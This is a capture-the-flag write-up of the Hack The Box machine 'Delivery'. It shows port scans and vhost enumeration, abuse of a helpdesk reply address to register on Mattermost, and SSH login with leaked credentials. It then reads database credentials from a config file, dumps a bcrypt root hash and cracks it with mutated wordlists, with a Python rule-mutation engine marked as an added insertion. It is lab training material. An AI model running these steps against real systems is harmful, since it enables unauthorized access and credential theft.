And here is another write-up of my attempts at cracking boxes on HTB!
Let’s run an nmap scan.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-04-17 09:34 EDT
Nmap scan report for 10.10.10.222
Host is up (0.030s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 9c:40:fa:85:9b:01:ac:ac:0e:bc:0c:19:51:8a:ee:27 (RSA)
|   256 5a:0c:c0:3b:9b:76:55:2e:6e:c4:f4:b9:5d:76:17:09 (ECDSA)
|_  256 b7:9d:f7:48:9d:a2:f2:76:30:fd:42:d3:35:3a:80:8c (ED25519)
80/tcp open  http    nginx 1.14.2
|_http-server-header: nginx/1.14.2
|_http-title: Welcome
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.84 seconds
With only SSH and a web port open, let's poke at the web service. Meanwhile we can run a full scan covering all 65535 TCP ports.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-04-17 09:35 EDT
Nmap scan report for 10.10.10.222
Host is up (0.060s latency).
Not shown: 65532 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 9c:40:fa:85:9b:01:ac:ac:0e:bc:0c:19:51:8a:ee:27 (RSA)
|   256 5a:0c:c0:3b:9b:76:55:2e:6e:c4:f4:b9:5d:76:17:09 (ECDSA)
|_  256 b7:9d:f7:48:9d:a2:f2:76:30:fd:42:d3:35:3a:80:8c (ED25519)
80/tcp   open  http    nginx 1.14.2
|_http-server-header: nginx/1.14.2
|_http-title: Welcome
8065/tcp open  unknown
| fingerprint-strings: 
|   GenericLines, Help, RTSPRequest, SSLSessionReq, TerminalServerCookie: 
|     HTTP/1.1 400 Bad Request
|     Content-Type: text/plain; charset=utf-8
|     Connection: close
|     Request
|   GetRequest: 
|     HTTP/1.0 200 OK
|     Accept-Ranges: bytes
|     Cache-Control: no-cache, max-age=31556926, public
|     Content-Length: 3108
|     Content-Security-Policy: frame-ancestors 'self'; script-src 'self' cdn.rudderlabs.com
|     Content-Type: text/html; charset=utf-8
|     Last-Modified: Sat, 17 Apr 2021 07:56:09 GMT
|     X-Frame-Options: SAMEORIGIN
|     X-Request-Id: ybfufx5yptf3fbpwd648s7uxoy
|     X-Version-Id: 5.30.0.5.30.1.57fb31b889bf81d99d8af8176d4bbaaa.false
|     Date: Sat, 17 Apr 2021 13:46:13 GMT
|     <!doctype html><html lang="en"><head><meta charset="utf-8"><meta name="viewport" content="width=device-width,initial-scale=1,maximum-scale=1,user-scalable=0"><meta name="robots" content="noindex, nofollow"><meta name="referrer" content="no-referrer"><title>Mattermost</title><meta name="mobile-web-app-capable" content="yes"><meta name="application-name" content="Mattermost"><meta name="format-detection" content="telephone=no"><link re
|   HTTPOptions: 
|     HTTP/1.0 405 Method Not Allowed
|     Date: Sat, 17 Apr 2021 13:46:13 GMT
|_    Content-Length: 0
1 service unrecognized despite returning data.
If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 117.89 seconds
Brute-forcing directories gave nothing, so let's check whether the web server routes virtual hosts by enumerating subdomains of delivery.htb.
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Domain:     delivery.htb
[+] Threads:    10
[+] Timeout:    1s
[+] Wordlist:   /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt
===============================================================
2021/04/17 09:52:48 Starting gobuster in DNS enumeration mode
===============================================================
Found: helpdesk.delivery.htb
The helpdesk vhost runs a ticketing system called osTicket. It's written in PHP, so I'd guess there is also a MySQL database running on the host. No interesting exploits on Exploit-DB yet.
The service that returned unexpected output on port 8065 in the nmap scan turns out to be Mattermost, an open-source chat platform with some extra nuts and bolts, comparable to Slack. A quick look with searchsploit reveals no recent exploits; the ones that exist target older versions. We can create an account on this service, but we never receive the confirmation email. Either the mail service is not configured, it is configured to send only to specific email TLDs, or it can only deliver to localhost.
With that in mind, we simply create a ticket on osTicket and are assigned a reply address, so that customers can answer the email with their ticket ID. It's a common feature of ticketing systems, and I use that address to complete a valid registration on the Mattermost endpoint. Once we have an account on this service, we obtain credentials for the server as well as a hint noting that variants of the "PleaseSubscribe!" password are reused multiple times across the systems.
We log in to the server over SSH and quickly enumerate the system, finding database credentials in the Mattermost configuration.
┌──(kali㉿kali)-[~/Desktop/10.10.10.222]
└─$ ssh maildeliverer@delivery.htb
The authenticity of host 'delivery.htb (10.10.10.222)' can't be established.
ECDSA key fingerprint is SHA256:LKngIDlEjP2k8M7IAUkAoFgY/MbVVbMqvrFA6CUrHoM.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'delivery.htb,10.10.10.222' (ECDSA) to the list of known hosts.
maildeliverer@delivery.htb's password: 
Linux Delivery 4.19.0-13-amd64 #1 SMP Debian 4.19.160-2 (2020-11-28) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sat Apr 17 10:26:56 2021 from 10.10.14.69
maildeliverer@Delivery:~$ 
maildeliverer@Delivery:~$ ls -la
total 32
drwxr-xr-x 3 maildeliverer maildeliverer 4096 Apr 17 10:31 .
drwxr-xr-x 3 root          root          4096 Dec 26 09:01 ..
lrwxrwxrwx 1 root          root             9 Dec 28 07:04 .bash_history -> /dev/null
-rw-r--r-- 1 maildeliverer maildeliverer  220 Dec 26 09:01 .bash_logout
-rw-r--r-- 1 maildeliverer maildeliverer 3526 Dec 26 09:01 .bashrc
drwx------ 4 maildeliverer maildeliverer 4096 Apr 17 10:28 .gnupg
-rw------- 1 maildeliverer maildeliverer   70 Apr 17 10:31 .mysql_history
-rw-r--r-- 1 maildeliverer maildeliverer  807 Dec 26 09:01 .profile
-r-------- 1 maildeliverer maildeliverer   33 Apr 17 10:26 user.txt
maildeliverer@Delivery:~$ id
uid=1000(maildeliverer) gid=1000(maildeliverer) groups=1000(maildeliverer)
maildeliverer@Delivery:~$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: ens192: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
    link/ether 00:50:56:b9:e6:8e brd ff:ff:ff:ff:ff:ff
    inet 10.10.10.222/24 brd 10.10.10.255 scope global ens192
       valid_lft forever preferred_lft forever
    inet6 dead:beef::250:56ff:feb9:e68e/64 scope global dynamic mngtmpaddr 
       valid_lft 85968sec preferred_lft 13968sec
    inet6 fe80::250:56ff:feb9:e68e/64 scope link 
       valid_lft forever preferred_lft forever
[...snip...]
maildeliverer@Delivery:~$ cat /opt/mattermost/config | grep "SqlSettings" -A 15
    "SqlSettings": {
        "DriverName": "mysql",
        "DataSource": "mmuser:Crack_The_MM_Admin_PW@tcp(127.0.0.1:3306)/mattermost?charset=utf8mb4,utf8\u0026readTimeout=30s\u0026writeTimeout=30s",
        "DataSourceReplicas": [],
        "DataSourceSearchReplicas": [],
        "MaxIdleConns": 20,
        "ConnMaxLifetimeMilliseconds": 3600000,
        "MaxOpenConns": 300,
        "Trace": false,
        "AtRestEncryptKey": "n5uax3d4f919obtsp1pw1k5xetq1enez",
        "QueryTimeout": 30,
        "DisableDatabaseSearch": false
    },
We now have the password for the MySQL user mmuser, so I naturally log in and dump the database on the lookout for some juicy information.
mysql -u mmuser -D mattermost -p
We find a table called Users; dumping it gives us the password hash (bcrypt) of the root account:
SELECT * FROM Users;
[...snip...]
root:$2a$10$VM6EeymRxJ29r8Wjkr8Dtev0O.1STWb4.4ScG.anuu7v0EFJwgjjO
We use the hint from earlier and generate variations of the reused password with hashcat's rule engine, then crack the hash with john!
┌──(kali㉿kali)-[~/Desktop/10.10.10.222]
└─$ vim words.txt

┌──(kali㉿kali)-[~/Desktop/10.10.10.222]
└─$ cat words.txt
PleaseSubscribe
PleaseSubscribe!
Please
Subscribe

┌──(kali㉿kali)-[~/Desktop/10.10.10.222]
└─$ hashcat --force words.txt -r /usr/share/hashcat/rules/best64.rule --stdout > mutated_words.txt

┌──(kali㉿kali)-[~/Desktop/10.10.10.222]
└─$ less mutated_words.txt

┌──(kali㉿kali)-[~/Desktop/10.10.10.222]
└─$ wc mutated_words.txt
 308  308 3574 mutated_words.txt

┌──(kali㉿kali)-[~/Desktop/10.10.10.222]
└─$ john creds_mysql_root --wordlist=./mutated_words.txt
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 1024 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
PleaseSubscribe!21 (root)
1g 0:00:00:01 DONE (2021-04-17 12:48) 0.7874g/s 85.03p/s 85.03c/s 85.03C/s PleaseSubscribe!9..PleaseSubscribea
Use the "--show" option to display all of the cracked passwords reliably
Session completed
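To make the mutation step concrete, here is an added example (not from the original post and not hashcat's code): a miniature rule engine in Python that applies hashcat-style rule lines to the four base words from words.txt above. The rule subset and the RULES list are constructed for illustration; best64.rule itself is not reproduced. Like `hashcat --stdout`, `mutate` emits one candidate per (word, rule) pair, which is why the 308-line output above is a multiple of the four base words, and the `explain` helper shows which single rule turns a known base password into the recovered one, the check a defender runs when auditing for variants of a shared password.

```python
"""Miniature hashcat-style rule engine (constructed example, not hashcat's own code).
Functions: ':' no-op, l lower, u upper, c capitalize, t toggle, r reverse, d duplicate,
[ / ] drop first/last, { / } rotate left/right, $X append, ^X prepend, sXY replace X->Y."""
SIMPLE = {  # rule functions that take no argument
    ":": lambda w: w, "l": str.lower, "u": str.upper, "t": str.swapcase,
    "c": lambda w: w[:1].upper() + w[1:].lower(), "r": lambda w: w[::-1],
    "d": lambda w: w * 2, "[": lambda w: w[1:], "]": lambda w: w[:-1],
    "{": lambda w: w[1:] + w[:1], "}": lambda w: w[-1:] + w[:-1],
}
ARG_LEN = {"$": 1, "^": 1, "s": 2}  # rule functions that take an argument

def tokenize(rule):
    """Split '$2 $1' or 'c$1' into (function, argument) pairs; spaces only separate."""
    funcs, i, rule = [], 0, rule.replace(" ", "")
    while i < len(rule):
        ch = rule[i]
        if ch not in SIMPLE and ch not in ARG_LEN:
            raise ValueError(f"unsupported rule function {ch!r} in {rule!r}")
        n = ARG_LEN.get(ch, 0)
        funcs.append((ch, rule[i + 1:i + 1 + n]))
        i += 1 + n
    return funcs

def apply_rule(word, rule):
    """Apply one rule line to one word, left to right, as hashcat's engine does."""
    for op, arg in tokenize(rule):
        if op in SIMPLE:
            word = SIMPLE[op](word)
        elif op == "$":
            word = word + arg
        elif op == "^":
            word = arg + word
        else:  # 's': replace every X with Y
            word = word.replace(arg[0], arg[1])
    return word

def mutate(words, rules):
    """Like `hashcat --stdout words.txt -r rules`: one candidate per (word, rule) pair."""
    return [apply_rule(w, r) for w in words for r in rules]

def explain(candidate, words, rules):
    """Audit helper: which (base word, rule) pairs turn a known base into this password?"""
    return [(w, r) for w in words for r in rules if apply_rule(w, r) == candidate]

# Constructed inputs: the four base words from the page's words.txt and a small rule
# subset in hashcat syntax (the page fed the full best64.rule, not reproduced here).
BASE_WORDS = ["PleaseSubscribe", "PleaseSubscribe!", "Please", "Subscribe"]
RULES = [":", "l", "u", "c", "t", "r", "d", "[", "]", "{", "}",
         "$1", "$2 $1", "$1$2$3", "^1", "sa@", "ss$"]
```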
Back on the victim machine, the cracked credentials give us root!
maildeliverer@Delivery:~$ su
Password: 
root@Delivery:/home/maildeliverer# 
root@Delivery:/home/maildeliverer# cd /root
root@Delivery:~# ls -la
total 44
drwx------  5 root root 4096 Jan  5 06:39 .
drwxr-xr-x 18 root root 4096 Jan  5 06:06 ..
lrwxrwxrwx  1 root root    9 Dec 28 07:04 .bash_history -> /dev/null
-rw-r--r--  1 root root  570 Jan 31  2010 .bashrc
drwxr-xr-x  3 root root 4096 Dec 26 09:33 .cache
drwx------  3 root root 4096 Dec 27 13:41 .gnupg
-rwxr-x---  1 root root  103 Dec 26 11:26 mail.sh
-r--------  1 root root  382 Dec 28 07:02 note.txt
-rw-r-----  1 root root  148 Aug 17  2015 .profile
-rw-r-----  1 root root 1499 Dec 26 10:55 py-smtp.py
-r--------  1 root root   33 Apr 17 12:40 root.txt
drwxr-xr-x  2 root root 4096 Dec 27 14:28 .vim
This was a fairly easy box! Let’s crack more and stay fresh!
Have a good one and thanks for reading!